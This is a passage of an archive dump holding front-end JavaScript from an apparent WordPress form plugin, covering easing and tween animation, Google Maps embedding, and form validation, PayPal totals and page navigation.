Q/2*a6*a6*a6*a6*a6+J}return Q/2*((a6-=2)*a6*a6*a6*a6+2)+J},sineIn:function(a6,J,Q,a5){return -Q*Math.cos(a6/a5*(Math.PI/2))+Q+J},sineOut:function(a6,J,Q,a5){return Q*Math.sin(a6/a5*(Math.PI/2))+J},sineInOut:function(a6,J,Q,a5){return -Q/2*(Math.cos(Math.PI*a6/a5)-1)+J},expoIn:function(a6,J,Q,a5){return(a6==0)?J:Q*Math.pow(2,10*(a6/a5-1))+J},expoOut:function(a6,J,Q,a5){return(a6==a5)?J+Q:Q*(-Math.pow(2,-10*a6/a5)+1)+J},expoInOut:function(a6,J,Q,a5){if(a6==0){return J}if(a6==a5){return J+Q}if((a6/=a5/2)<1){return Q/2*Math.pow(2,10*(a6-1))+J}return Q/2*(-Math.pow(2,-10*--a6)+2)+J},circIn:function(a6,J,Q,a5){return -Q*(Math.sqrt(1-(a6/=a5)*a6)-1)+J},circOut:function(a6,J,Q,a5){return Q*Math.sqrt(1-(a6=a6/a5-1)*a6)+J},circInOut:function(a6,J,Q,a5){if((a6/=a5/2)<1){return -Q/2*(Math.sqrt(1-a6*a6)-1)+J}return Q/2*(Math.sqrt(1-(a6-=2)*a6)+1)+J},elasticIn:function(a8,J,Q,a5,a9,a6){if(a8==0){return J}if((a8/=a5)==1){return J+Q}if(!a6){a6=a5*0.3}if(!a9){a9=1}if(a9<Math.abs(Q)){a9=Q;var a7=a6/4}else{var a7=a6/(2*Math.PI)*Math.asin(Q/a9)}return -(a9*Math.pow(2,10*(a8-=1))*Math.sin((a8*a5-a7)*(2*Math.PI)/a6))+J},elasticOut:function(a8,J,Q,a5,a9,a6){if(a8==0){return J}if((a8/=a5)==1){return J+Q}if(!a6){a6=a5*0.3}if(!a9){a9=1}if(a9<Math.abs(Q)){a9=Q;var a7=a6/4}else{var a7=a6/(2*Math.PI)*Math.asin(Q/a9)}return a9*Math.pow(2,-10*a8)*Math.sin((a8*a5-a7)*(2*Math.PI)/a6)+Q+J},elasticInOut:function(a8,J,Q,a5,a9,a6){if(a8==0){return J}if((a8/=a5/2)==2){return J+Q}if(!a6){a6=a5*(0.3*1.5)}if(!a9){a9=1}if(a9<Math.abs(Q)){a9=Q;var a7=a6/4}else{var a7=a6/(2*Math.PI)*Math.asin(Q/a9)}if(a8<1){return -0.5*(a9*Math.pow(2,10*(a8-=1))*Math.sin((a8*a5-a7)*(2*Math.PI)/a6))+J}return a9*Math.pow(2,-10*(a8-=1))*Math.sin((a8*a5-a7)*(2*Math.PI)/a6)*0.5+Q+J},backOffset:1.70158,backIn:function(a7,J,Q,a5,a6){if(!a6){a6=au.easings.backOffset}return Q*(a7/=a5)*a7*((a6+1)*a7-a6)+J},backOut:function(a7,J,Q,a5,a6){if(!a6){a6=au.easings.backOffset}return Q*((a7=a7/a5-1)*a7*((a6+1)*a7+a6)+1)+J},backInOut:function(a7,J,Q,a5,a6){if(!a6){a6=au.easings.backOffset}if((a7/=a5/2)<1){return Q/2*(a7*a7*(((a6*=(1.525))+1)*a7-a6))+J}return Q/2*((a7-=2)*a7*(((a6*=(1.525))+1)*a7+a6)+2)+J},bounceIn:function(a6,J,Q,a5){return Q-au.easings.bounceOut(a5-a6,0,Q,a5)+J},bounceOut:function(a6,J,Q,a5){if((a6/=a5)<(1/2.75)){return Q*(7.5625*a6*a6)+J}else{if(a6<(2/2.75)){return Q*(7.5625*(a6-=(1.5/2.75))*a6+0.75)+J}else{if(a6<(2.5/2.75)){return Q*(7.5625*(a6-=(2.25/2.75))*a6+0.9375)+J}else{return Q*(7.5625*(a6-=(2.625/2.75))*a6+0.984375)+J}}}},bounceInOut:function(a6,J,Q,a5){if(a6<a5/2){return au.easings.bounceIn(a6*2,0,Q,a5)*0.5+J}return au.easings.bounceOut(a6*2-a5,0,Q,a5)*0.5+Q*0.5+J}};
/* tween */
(function(){var J=aE("Tween",{__init:function(Q,a5){this.el=aC(Q);av(this,a5||{})},__static:{uid:0,tweens:{},timerSpeed:20,subscribe:function(Q){J.tweens[Q.tweenId]=function(){Q.step.call(Q)};if(!J.timerHandle){J.startTimer()}},unSubscribe:function(Q){delete J.tweens[Q.tweenId];clearTimeout(J.timeoutHandle);J.timeoutHandle=setTimeout(function(){if(aN(J.tweens)){J.stopTimer()}},250)},startTimer:function(){var Q=function(){for(var a5 in J.tweens){J.tweens[a5]()}};J.timerHandle=setInterval(Q,J.timerSpeed)},stopTimer:function(){if(J.timerHandle){clearInterval(J.timerHandle)}J.timerHandle=null}},easing:au.easings.sineInOut,duration:500,unit:"px",setEasing:function(Q){this.easing=au.easings[Q];return this},setDuration:function(Q){this.duration=Q;return this},setOpacity:function(Q){B(this.el,Q);return this},setElement:function(Q){this.el=aC(Q);return this},sequence:function(){this.sequenceStack=O(arguments);this.callSequence();return this},callSequence:function(){var Q=this,a5=a(Q.sequenceStack)?Q.sequenceStack.shift():null;if(a5){if(aL(a5)){a5.call(Q,Q)}else{Q.start(a5)}}else{Q.fireEvent("sequenceComplete")}},stop:function(){J.unSubscribe(this);return this},start:function(a9){var bf=this,bc=O(arguments),a7=bf.el;if(aA(bc[1])){a9={};a9[bc[0]]=bc[1]}bf.stop();bf.stack=[];if(a(a7)||a0(a7)){a7=a7[0]}if("duration" in a9){bf.setDuration(a9.duration);delete a9.duration}if("easing" in a9){bf.setEasing(a9.easing);delete a9.easing}var Q,be,bd;for(Q in a9){be=g(Q),bd=a9[Q];if(Q.indexOf("color")!==-1){if(a(bd)){bd=[aU(bd[0],"rgb-array"),aU(bd[1],"rgb-array")]}else{var a5=aG(a7,be);if(isNaN(a5)&&!aY(a5)){return aH('getStyle for "%s" returns NaN',be)}bd=[aU(a5,"rgb-array"),aU(bd,"rgb-array")]}bd.color=true}else{if(Q==="background-position"){if(a(bd[0])){bd=[bd[0][0],bd[0][1]],[bd[1][0],bd[1][1]]}else{var ba=0,a8=0,bb=aG(a7,be),a6=/(\d+)[\w%]{1,2}\s+(\d+)[\w%]{1,2}/.exec(bb);if(bb&&a6){ba=parseInt(a6[1],10);a8=parseInt(a6[2],10)}bd=[[ba,bd[0]],[a8,bd[1]]]}bd.bgp=true}else{if(!a(bd)){var a5=parseInt(aG(a7,be),10);if(isNaN(a5)&&!aY(a5)){return aH('getStyle for "%s" returns NaN',be)}bd=[a5,bd];if(Q==="opacity"){bd.opac=true}}else{bd=bd}}}bf.stack.push({prop:be,from:bd[0],to:bd[1],color:bd.color,bgp:bd.bgp,opac:bd.opac})}bf.startTime=+(new Date);bf.tweenId=++J.uid;J.subscribe(bf);bf.fireEvent("start");return bf},step:function(){var Q=this,a5=+(new Date);if(a5<Q.startTime+Q.duration){Q.elapsedTime=a5-Q.startTime}else{Q.stop();Q.tidyUp();setTimeout(function(){Q.fireEvent("complete");Q.callSequence()},0);return}Q.increase()},tidyUp:function(){var Q=this,a7,a6=Q.el.style,a5=Q.stack.length-1;do{a7=Q.stack[a5];if(a7.opac){Q.setOpacity(a7.to)}else{if(a7.color){a6[a7.prop]="rgb("+a7.to.join(",")+")"}else{if(a7.bgp){a6.backgroundPosition=a7.to[0]+Q.unit+" "+a7.to[1]+Q.unit}else{a6[a7.prop]=a7.to+Q.unit}}}}while(a5--)},increase:function(){var a5=this,ba,Q=Math.round,a8=a5.el.style,a7=a5.stack.length-1,a6=(aK.ie||aK.opera||aK.webkit)&&a5.unit==="px";do{ba=a5.stack[a7];if(ba.opac){a5.setOpacity(a5.compute(ba.from,ba.to))}else{if(ba.color){a8[ba.prop]="rgb("+Q(a5.compute(ba.from[0],ba.to[0]))+","+Q(a5.compute(ba.from[1],ba.to[1]))+","+Q(a5.compute(ba.from[2],ba.to[2]))+")"}else{if(ba.bgp){a8.backgroundPosition=a5.compute(ba.from[0],ba.to[0])+a5.unit+" "+a5.compute(ba.from[1],ba.to[1])+a5.unit}else{var a9=a5.compute(ba.from,ba.to);a8[ba.prop]=(a6?Q(a9):a9)+a5.unit}}}}while(a7--)},compute:function(a5,Q){return this.easing(this.elapsedTime,a5,(Q-a5),this.duration)}})})();var k=au.Tween;
/* load */
(function(){var J=au.Load={cache:{},js:function(ba,bb,a8){if(J.cache[ba]){return J.cache[ba]}var a5=av({type:"text/javascript"},a8||{}),a7=ao("script",a5),a9=function(){J.cache[ba]=a7;if(bb){aq(bb,a7,a7)}},Q=function(bc){ab(bc,': "'+ba+'"')};try{if(a7.readyState){a7.onreadystatechange=function(){if(/^(loaded|complete)$/.test(a7.readyState)){a7.onreadystatechange=null;a9()}}}else{a7.onload=a9;a7.onerror=Q}a7.src=ba;aV(a7,F);return a7}catch(a6){ab(a6)}},css:function(a7,a6){if(J.cache[a7]){return J.cache[a7]}var Q=av({type:"text/css",media:"screen",rel:"stylesheet"},a6||{}),a5=ao("link",Q);a5.href=a7;J.cache[a7]=a5;aV(a5,F);return a5},img:function(a8,a9,a6){if(J.cache[a8]){return J.cache[a8]}var a5=ao("img",a6||{}),a7=function(){J.cache[a8]=a5;if(a9){a9.call(a5,a5)}},Q=function(ba){aH(I(ba.type)+' loading image: "'+a8+'"')};a5.onload=a7;a5.onerror=a5.onabort=Q;a5.src=a8;return a5},purge:function(a5){var Q=J.cache[a5];if(!Q){return}if(aR.contains(Q)){y(Q)}Q.onload=Q.onerror=Q.onabort=null;delete J.cache[a5]}}})();var u=au.Load;
/* poll */
(function(){var J=aE("Poll",{__static:{pollTime:300,handlers:{},subscribe:function(a5,a6,a7){var Q=a5+"",a8;if(!(Q in J.handlers)){a8=aY(a5)?J.keywords[a5]:a5;J.handlers[Q]=new ad(a8)}return J.handlers[Q].subscribe(a6,a7||null)},unSubscribe:function(Q,a5){J.handlers[Q].unsubscribe(a5)},keywords:{vslow:1000,slow:500,fast:100,vfast:50}},__init:function(Q){av(this,{handlers:{},pollTime:Q||J.pollTime})},setPollTime:function(Q){this.pollTime=Q;return this},start:function(){var Q=this;clearTimeout(Q.timerHandle);clearTimeout(Q.firstPoll);Q.firstPoll=setTimeout(function(){(function a5(){for(var a7 in Q.handlers){try{Q.handlers[a7]()}catch(a6){ab(a6)}}Q.timerHandle=setTimeout(a5,Q.pollTime)})()},Q.pollTime)},stop:function(){var Q=this;clearTimeout(Q.timerHandle);Q.timerHandle=null;return Q},clear:function(){var Q=this;Q.stop();Q.handlers=null;return Q},subscribe:function(a5,a6){var Q=this,a7;Q.uid=Q.uid||0;a7=a6||++Q.uid;if(Q.handlers[a7]){return false}Q.handlers[a7]=a5;if(!Q.timerHandle){Q.start()}return a7},unSubscribe:function(a5){var Q=this;delete Q.handlers[a5];if(aN(Q.handlers)){Q.stop()}}})})();var ad=au.Poll})();js/if_gmap_front_end.js000060400000014054152434416630011166 0ustar00/* Code based on Google Map APIv3 Tutorials */


var gmapdata= new Array();
var gmapmarker = new Array();

function if_gmap_init(id, form_id)
{
	if(document.getElementById(id+"_element"+form_id)){
	map=document.getElementById(id+"_element"+form_id);
	var def_zoomval = parseInt(map.getAttribute("zoom"));
	var def_longval = map.getAttribute("center_x");
	var def_latval  = map.getAttribute("center_y");

    var curpoint = new google.maps.LatLng(def_latval,def_longval);

    gmapdata[id] = new google.maps.Map(document.getElementById(id+"_element"+form_id), {
                center: curpoint,
                zoom: def_zoomval,
                mapTypeId: 'roadmap'
                });
        
    gmapmarker[id] = new Array();
   
        return false;
		}
		else
		{
		draggab=false;
map=document.getElementById(id);
var def_zoomval = parseInt(map.getAttribute("zoom"));
var def_longval = map.getAttribute("long");
var def_latval = map.getAttribute("lat");

        var curpoint = new google.maps.LatLng(def_latval,def_longval);

        gmapdata = new google.maps.Map(document.getElementById(id), {
                center: curpoint,
                zoom: def_zoomval,
                mapTypeId: 'roadmap'
                });
                
        geocoder = new google.maps.Geocoder();
        

        gmapmarker = new google.maps.Marker({
                                        map: gmapdata,
                                        position: curpoint,
                                        draggable: draggab
                                });
		gmapmarker.setDraggable(draggab);
        infoW = new google.maps.InfoWindow;
        
        google.maps.event.addListener(gmapdata, 'mouseover', function(event) 
        {       
        if(!document.getElementById("longval"))
                        gmapmarker.draggable=false;
        });
        
        google.maps.event.addListener(gmapdata, 'click', function(event) {
                if(document.getElementById("longval"))
                {
                document.getElementById("longval").value = event.latLng.lng().toFixed(6);
                document.getElementById("latval").value = event.latLng.lat().toFixed(6);
                gmapmarker.setPosition(event.latLng);
                if_gmap_updateMap();
                
                 geocoder.geocode({'latLng': gmapmarker.getPosition()}, function(results, status) 
                {
                        if (status == google.maps.GeocoderStatus.OK) 
                        {
                                if (results[0]) 
                                {
                        
                                          if(document.getElementById("addrval")) document.getElementById("addrval").value = results[0].formatted_address;
                                }
                        }
                    });
        }

        });

          google.maps.event.addListener(gmapmarker, 'drag', function() {
                if(document.getElementById("longval"))
                {
                    geocoder.geocode({'latLng': gmapmarker.getPosition()}, function(results, status) 
                        {
                              if (status == google.maps.GeocoderStatus.OK) 
                              {
                                if (results[0]) 
                                        {
                                                
                                                if(document.getElementById("addrval")) document.getElementById("addrval").value = results[0].formatted_address;
                                        }
                                }
                                          
                        });
                                  
                if_gmap_updateMap();
                          document.getElementById("latval").value = gmapmarker.getPosition().lat().toFixed(6);
                          document.getElementById("longval").value = gmapmarker.getPosition().lng().toFixed(6);
                }
  });
        google.maps.event.addListener(gmapmarker, 'click', function() {
                infoW.setContent('<div style="overflow: hidden;">'+document.getElementById(id).getAttribute('info')+"</div>");
				var infoWOpt = {
				maxWidth: "300"
				};
				infoW.setOptions(infoWOpt);
                infoW.open(this.getMap(), this);
        });
        
if(document.getElementById("longval"))
{
        document.getElementById("longval").value = def_longval;
        document.getElementById("latval").value = def_latval;
        
        geocoder.geocode({'latLng': gmapmarker.getPosition()}, function(results, status) {
      if (status == google.maps.GeocoderStatus.OK) {
        if (results[0]) {

                 if(document.getElementById("addrval")) document.getElementById("addrval").value = results[0].formatted_address;
        }
      }
    });
        
}


        
        
        return false;
		
		}
} // end of if_gmap_init


function add_marker_on_map(id, i, w_long, w_lat, w_info, form_id, dragb)
{
	var marker_point = new google.maps.LatLng(w_lat, w_long);
	
	
       
    gmapmarker[id][i] = new google.maps.Marker({
                                        map: gmapdata[id],
                                        position: marker_point,
                                        draggable: dragb
                                });
								
	gmapmarker[id][i].setDraggable(dragb);
	
	if(dragb)
	{
		google.maps.event.addListener(gmapmarker[id][i], 'drag', function() 
		{
				document.getElementById(id+"_lat"+form_id).value = gmapmarker[id][i].getPosition().lat().toFixed(6);
				document.getElementById(id+"_long"+form_id).value = gmapmarker[id][i].getPosition().lng().toFixed(6);
		});
	}
	
    infoW = new google.maps.InfoWindow;
        
    google.maps.event.addListener(gmapmarker[id][i], 'click', function() 
	{
        infoW.setContent('<div style="overflow: hidden;">'+document.getElementById(id+"_element"+form_id).getAttribute('info'+i)+"</div>");
		var infoWOpt = {
				maxWidth: "300"
				};
		infoW.setOptions(infoWOpt);
        infoW.open(this.getMap(), this);
    });
        
   return false;

	
} // end of if_gmap_init

js/main_div_front_end.js000060400000073303152434416630011354 0ustar00F=2;

var c;

var a=new Array();

var rated=false;

function set_total_value(form_id)
{
var FormCurrency = eval("FormCurrency_" + form_id);
if(jQuery('.paypal_total'+form_id).length==0)
	return;
var div_paypal_show= jQuery('.paypal_total'+form_id);
var div_paypal_products = jQuery('.paypal_products'+form_id);
var div_paypal_tax = jQuery('.paypal_tax'+form_id);
var input_paypal_total = jQuery('.input_paypal_total'+form_id);
var total=0;
var total_shipping=0;
div_paypal_products.html('');

div_paypal_tax.html('');

n=parseInt(jQuery('#counter'+form_id).val());
	
jQuery("div[type='type_paypal_checkbox'], div[type='type_paypal_radio']").each(
	function()
	{
		id=jQuery(this).parent().attr('wdid');
		
		jQuery(this).find('input:checked').each(
		
			function()
			{
				label= jQuery("label[for='"+jQuery(this).attr('id')+"']").html();
				span_value = FormCurrency + jQuery(this).val()+(jQuery('#wdform_'+id+"_element_quantity"+form_id).length!=0 ? ' x'+jQuery('#wdform_'+id+"_element_quantity"+form_id).val() : '');
				total =total + jQuery(this).val() * parseInt((jQuery('#wdform_'+id+"_element_quantity"+form_id).length!=0 ? jQuery('#wdform_'+id+"_element_quantity"+form_id).val() : 1));
				div_paypal_products.html(div_paypal_products.html()+"<div>"+label+ ' - '+ span_value+"</div>");
			}
		);
	}
); 	

jQuery("div[type='type_paypal_shipping']").each(
	function()
	{
		id=jQuery(this).parent().attr('wdid');
		
		jQuery(this).find('input:checked').each(
		
			function()
			{
				label= jQuery("label[for='"+jQuery(this).attr('id')+"']").html();
				span_value = FormCurrency + jQuery(this).val()+(jQuery('#wdform_'+id+"_element_quantity"+form_id).length!=0 ? ' x'+jQuery('#wdform_'+id+"_element_quantity"+form_id).val() : '');
				total_shipping =total_shipping + jQuery(this).val() * parseInt((jQuery('#wdform_'+id+"_element_quantity"+form_id).length!=0 ? jQuery('#wdform_'+id+"_element_quantity"+form_id).val() : 1));
				div_paypal_products.html(div_paypal_products.html()+"<div>"+label+ ' - '+ span_value+"</div>");
			}
		);
	}
); 	

jQuery("div[type='type_paypal_select']").each(
	function()
	{
		id=jQuery(this).parent().attr('wdid');
		if(jQuery(this).find('select').val()!='')
		{
			label = jQuery(this).find('select option:selected').html();
			span_value = FormCurrency + jQuery(this).find('select').val()+(jQuery('#wdform_'+id+"_element_quantity"+form_id).length!=0 ? ' x'+jQuery('#wdform_'+id+"_element_quantity"+form_id).val() : '');
			total =total + jQuery(this).find('select').val() * parseInt((jQuery('#wdform_'+id+"_element_quantity"+form_id).length!=0 ? jQuery('#wdform_'+id+"_element_quantity"+form_id).val() : 1));
			div_paypal_products.html(div_paypal_products.html()+"<div>"+label+ ' - '+ span_value+"</div>");
		}
	}
); 	

jQuery("div[type='type_paypal_price']").each(
	function()
	{
		id=jQuery(this).parent().attr('wdid');
		if(jQuery('#wdform_'+id+"_element_dollars"+form_id).hasClass('input_active') || jQuery('#wdform_'+id+"_element_cents"+form_id).hasClass('input_active'))
		{
			label= jQuery(this).find('.wdform-label').html();
			cents='00';
			dollars='0';

			if( jQuery('#wdform_'+id+"_element_dollars"+form_id).hasClass('input_active'))
				if(jQuery('#wdform_'+id+"_element_dollars"+form_id).val()!='')
					dollars=jQuery('#wdform_'+id+"_element_dollars"+form_id).val();
			
			if( jQuery('#wdform_'+id+"_element_cents"+form_id).hasClass('input_active') && jQuery('#wdform_'+id+"_element_cents"+form_id).val()!='')
				if(jQuery('#wdform_'+id+"_element_cents"+form_id).val().length==1)
					cents='0'+jQuery('#wdform_'+id+"_element_cents"+form_id).val();
				else 
					cents=jQuery('#wdform_'+id+"_element_cents"+form_id).val();
					
			span_value = FormCurrency + dollars+'.'+cents;
			total =total +  parseFloat(dollars+'.'+cents);
			div_paypal_products.html(div_paypal_products.html()+"<div>"+label+ ' - '+ span_value+"</div>");
		}
	}
); 	
var FormPaypalTax = eval("FormPaypalTax_" + form_id);
if(FormPaypalTax != 0)
	div_paypal_tax.html('Tax: ' + FormCurrency + (((total)*FormPaypalTax) / 100).toFixed(2));	
								
jQuery('.div_total'+form_id).html(FormCurrency + (parseFloat((total *(1+FormPaypalTax/100)).toFixed(2))+total_shipping).toFixed(2));	


input_paypal_total.val(FormCurrency + (parseFloat((total *(1+FormPaypalTax/100)).toFixed(2))+total_shipping).toFixed(2))  ;	
}	

function check_isnum_or_minus(e)
{
   	var chCode1 = e.which || e.keyCode;
	if (chCode1 != 45 )
	{
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	}	
	return true;
}

function sum_grading_values(num,form_id){

	var sum = 0;
	for(var k=0; k<100;k++)
	{
		if(document.getElementById(num+'_element'+form_id+'_'+k))
			if(document.getElementById(num+'_element'+form_id+'_'+k).value)
			{
				sum = sum+parseInt(document.getElementById(num+'_element'+form_id+'_'+k).value);
			}
			
        if(document.getElementById(num+'_total_element'+form_id)){
		if(sum > document.getElementById(num+'_total_element'+form_id).innerHTML){
		
		document.getElementById(num+'_text_element'+form_id).innerHTML =" "+ WDF_GRADING_TEXT+" " + document.getElementById(num+'_total_element'+form_id).innerHTML;
		}
		else{
		document.getElementById(num+'_text_element'+form_id).innerHTML="";
		}
		}
	}
	
	 if(document.getElementById(num+'_sum_element'+form_id))
	document.getElementById(num+'_sum_element'+form_id).innerHTML = sum;

}




function change_src(id,el_id,form_id,color){
	if(rated==false){
	for(var j=0;j<=id;j++)
	document.getElementById(el_id+'_star_'+j+'_'+form_id).src=fm_objectL10n.plugin_url+"/images/star_"+color+'.png';
}
}


function reset_src(id,el_id, form_id){
	if(rated==false){
	for(var j=0;j<=id;j++)
	document.getElementById(el_id+'_star_'+j+'_'+form_id).src=fm_objectL10n.plugin_url+"/images/star.png";
	}
}

function select_star_rating(id,el_id,form_id, color,star_amount)
{
	rated=true;
	for(var j=0;j<=id;j++)
		document.getElementById(el_id+'_star_'+j+'_'+form_id).src=fm_objectL10n.plugin_url+"/images/star_"+color+".png";
	for(var k=id+1;k<=star_amount-1;k++)
		document.getElementById(el_id+'_star_'+k+'_'+form_id).src=fm_objectL10n.plugin_url+"/images/star.png";
	document.getElementById(el_id+'_selected_star_amount'+form_id).value=id+1;
}


function show_other_input(num, form_id)
{
	for(k=0;k<50;k++)
		if(	document.getElementById(num+"_element"+form_id+k)) 
			if(	document.getElementById(num+"_element"+form_id+k).getAttribute('other')) 
				if(	document.getElementById(num+"_element"+form_id+k).getAttribute('other')==1)
				{
					element_other=document.getElementById(num+"_element"+form_id+k);
					break;
				}

	parent_=element_other.parentNode;



	var br = document.createElement('br');
		br.setAttribute("id", num+"_other_br"+form_id);

	var el_other = document.createElement('input');
		el_other.setAttribute("id", num+"_other_input"+form_id);
		el_other.setAttribute("name", num+"_other_input"+form_id);
		el_other.setAttribute("type", "text");
		el_other.setAttribute("class", "other_input");

	parent_.appendChild(br);
	parent_.appendChild(el_other);

}

function check_isnum(e)
{
  	var chCode1 = e.which || e.keyCode;

    if ( jQuery.inArray(chCode1,[46,8,9,27,13,190]) != -1 || e.ctrlKey === true || (chCode1 >= 35 && chCode1 < 39))
        return true;

	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	return true;
	
}

function captcha_refresh(id,genid)
{
	srcArr=document.getElementById(id+genid).src.split("&r=");
	document.getElementById(id+genid).src=srcArr[0]+'&r='+Math.floor(Math.random()*100);
	document.getElementById(id+"_input"+genid).value='';
	document.getElementById(id+genid).style.display="inline-block";
}

function set_checked(id,j,form_id)
{
	checking=document.getElementById(id+"_element"+form_id+j);
	if(checking.getAttribute('other'))
		if(checking.getAttribute('other')==1)
			if(!checking.checked)
			{					
				if(document.getElementById(id+"_other_input"+form_id))
				{
					document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_br"+form_id));
					document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_input"+form_id));
				}
				return false;					
			}
	return true;
}

function set_default(id, j, form_id){	
if(document.getElementById(id+"_other_input"+form_id))
	{
		document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_br"+form_id));
		document.getElementById(id+"_other_input"+form_id).parentNode.removeChild(document.getElementById(id+"_other_input"+form_id));
	}
}

function add_0(x)
{
	if(jQuery(x).val().length==1)
		jQuery(x).val('0'+jQuery(x).val());
}

function check_hour(e, id, hour_interval)
{
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	hour=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	hour=parseFloat(hour);
	if((hour<0) || (hour>hour_interval))
        	return false;
	return true;
} 

function check_minute(e, id)

{	

		

   	var chCode1 = e.which || e.keyCode;

    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))

        return false;

	minute=""+document.getElementById(id).value+String.fromCharCode(chCode1);



	minute=parseFloat(minute);

	if((minute<0) || (minute>59))

        	return false;

	return true;

} 



function check_second(e, id)

{	

		

   	var chCode1 = e.which || e.keyCode;

    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))

        return false;

	second=""+document.getElementById(id).value+String.fromCharCode(chCode1);



	second=parseFloat(second);

	if((second<0) || (second>59))

        	return false;

	return true;

} 



function check_isnum_interval(e, x, from, to) {
  var chCode1 = e.which || e.keyCode;
  if (jQuery.inArray(chCode1,[46,8,9,27,13,190]) != -1 || e.ctrlKey === true || (chCode1 >= 35 && chCode1 < 39)) {
    return true;
  }
  if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
    return false;
  }
	val1=""+jQuery(x).val()+String.fromCharCode(chCode1);
	if (val1.length>2)
    return false;
	if (val1=='00')
    return false;
	if ((val1<from) || (val1>to))
    return false;
	return true;
}

function change_year(x)
{
	year=jQuery(x).val();
	from=parseFloat(jQuery(x).attr('from'));
	to=parseFloat(jQuery(x).attr('to'));
	year=parseFloat(year);
	if((year>=from) && (year<=to))
		jQuery(x).val(year);
	else
		jQuery(x).val('');
}

function check_day(e, x)
{	
   	var chCode1 = e.which || e.keyCode;
    if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;

	day=""+jQuery(x).val()+String.fromCharCode(chCode1);
	if(day.length>2)
        	return false;
	if(day=='00')
        	return false;
	day=parseFloat(day);
	if((day<0) || (day>31))
        	return false;
	return true;
} 

function check_month(e, x)
{	
   	var chCode1 = e.which || e.keyCode;
   	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;

	month=""+jQuery(x).val()+String.fromCharCode(chCode1);
	if(month.length>2)
        	return false;
	if(month=='00')
        	return false;
	month=parseFloat(month);
	if((month<0) || (month>12))
        	return false;
	return true;
} 



function check_year1(e, x)
{	
   	var chCode1 = e.which || e.keyCode;
   	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;

	year=""+jQuery(x).val()+String.fromCharCode(chCode1);
	to=parseFloat(jQuery(x).attr('to'));
	year=parseFloat(year);
	if(year>to)
        	return false;
	return true;
} 

function delete_value(x)
{
	ofontStyle=jQuery(x).attr('class');
	if(ofontStyle.indexOf("input_deactive")!=-1)
	{
		jQuery(x).val("").removeClass("input_deactive").addClass("input_active");
	}
}

function return_value(x)
{
	if(jQuery(x).val()=="")
	{
		jQuery(x).val(jQuery(x).attr('title')).removeClass("input_active").addClass("input_deactive");
	}
}

function destroyChildren(node)

{
  while (node.firstChild)
      node.removeChild(node.firstChild);
}

function generate_page_nav(id, form_id, form_view_count, form_view_max)

{

form_view=id;

page_nav=document.getElementById(form_id+'page_nav'+id);

destroyChildren(page_nav);

form_view_elemet=document.getElementById(form_id+'form_view'+id);

remove_whitespace(form_view_elemet.parentNode.parentNode);

display_none_form_views_all(form_id);



generate_page_bar(id, form_id, form_view_count, form_view_max);



form_view_elemet.parentNode.style.display="";

		var td = document.createElement("div");
			td.setAttribute("valign", "middle");
			td.setAttribute("align", "left");
			td.style.display="table-cell";
			td.style.width="40%";
		

		page_nav.appendChild(td);


if(form_view_elemet.parentNode.previousSibling && form_view_elemet.parentNode.previousSibling.previousSibling)

{

	if(form_view_elemet.parentNode.previousSibling.tagName=="DIV") {

		table=form_view_elemet.parentNode.previousSibling;
    
  }

	else

		if(form_view_elemet.parentNode.previousSibling.previousSibling.tagName=="DIV") {

			table=form_view_elemet.parentNode.previousSibling.previousSibling;
      
    }

		else

			table="none";

	if(table!="none")

	{

		if(!table.firstChild.tagName)

			table.removeChild(table.firstChild);





		previous_title	= form_view_elemet.getAttribute('previous_title');

		previous_type	= form_view_elemet.getAttribute('previous_type');
		if(previous_type=="text")
			td.setAttribute("class", "previous-page");

		previous_class	= form_view_elemet.getAttribute('previous_class');

		previous_checkable	= form_view_elemet.getAttribute('previous_checkable');

	

		next_or_previous="previous";



		previous=make_pagebreak_button(next_or_previous, previous_title, previous_type, previous_class, previous_checkable, id, form_id, form_view_count, form_view_max);

		

		td.appendChild(previous);


	}

}





		var td = document.createElement("div");
			td.setAttribute("id", form_id+"page_numbers"+form_view);
			td.setAttribute("valign", "middle");
			td.setAttribute("class", "page-numbers");
			td.setAttribute("align", "center");
			td.style.display="table-cell";

			

if(document.getElementById(form_id+'pages').getAttribute('show_numbers')=="true")

{

		k=0;

		for(j=1; j<=form_view_max; j++)

		{

			if(document.getElementById(form_id+'form_view'+j))

			{

				k++;		

				if(j==form_view)

					page_number=k;

			}

		}

		

		var cur = document.createElement('span');

			cur.setAttribute("class", "page_numbers");

			cur.innerHTML=page_number+'/'+k;

		

		td.appendChild(cur);



}

		page_nav.appendChild(td);



			var td = document.createElement("div");
				td.setAttribute("valign", "middle");
				td.setAttribute("align", "right");
				td.style.cssText = "display:table-cell; width:40%; text-align:right;";
		
				page_nav.appendChild(td);

not_next=false;


if(form_view_elemet.parentNode.nextSibling)

{

	
	if(form_view_elemet.parentNode.nextSibling.tagName=="DIV" && form_view_elemet.parentNode.nextSibling.className=="wdform-page-and-images")

		table=form_view_elemet.parentNode.nextSibling;

	else

		if(form_view_elemet.parentNode.nextSibling.nextSibling)

		{

			if(form_view_elemet.parentNode.nextSibling.nextSibling.tagName=="DIV")

				table=form_view_elemet.parentNode.nextSibling.nextSibling;

			else

				table="none";

		}

			else

				table="none";

			

	if(table!="none")

	{

		next_title		=form_view_elemet.getAttribute('next_title');

		next_type		=form_view_elemet.getAttribute('next_type');
		if(next_type=="text")
				td.setAttribute("class", "next-page");

		next_class		=form_view_elemet.getAttribute('next_class');

		next_checkable	=form_view_elemet.getAttribute('next_checkable');

	

		next_or_previous="next";

	

		next=make_pagebreak_button(next_or_previous, next_title, next_type, next_class, next_checkable, id, form_id, form_view_count, form_view_max);

		

		td.appendChild(next);


	}

	else

	{

		not_next=true;

	}

}

else

{

	not_next=true;

}


jQuery("#form" + form_id + " div[type='type_map']").each(
	function()
	{
